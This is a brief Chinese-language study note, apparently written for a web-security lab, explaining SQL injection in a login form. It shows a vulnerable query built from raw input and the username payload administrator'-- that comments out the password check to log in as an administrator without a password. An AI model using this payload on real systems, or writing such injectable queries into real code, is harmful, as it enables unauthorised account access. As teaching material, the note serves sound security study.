web应用需要用户输入账号密码，如果应用没有做任何防sqli的处理，可能直接用输入的username跟password组成这么个查询语句，这种场景就非常容易被攻击了

SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'

只要构造个输入达到以下目的即可。获得admin权限，即使在不知道密码的情况下，因为--是注释。这个adminstrator可以是试出来的，也可能是admin

SELECT * FROM users WHERE username = 'administrator'--' AND password = ''

所以登陆输入username = administrator'--

随便输入密码就能实现bypass了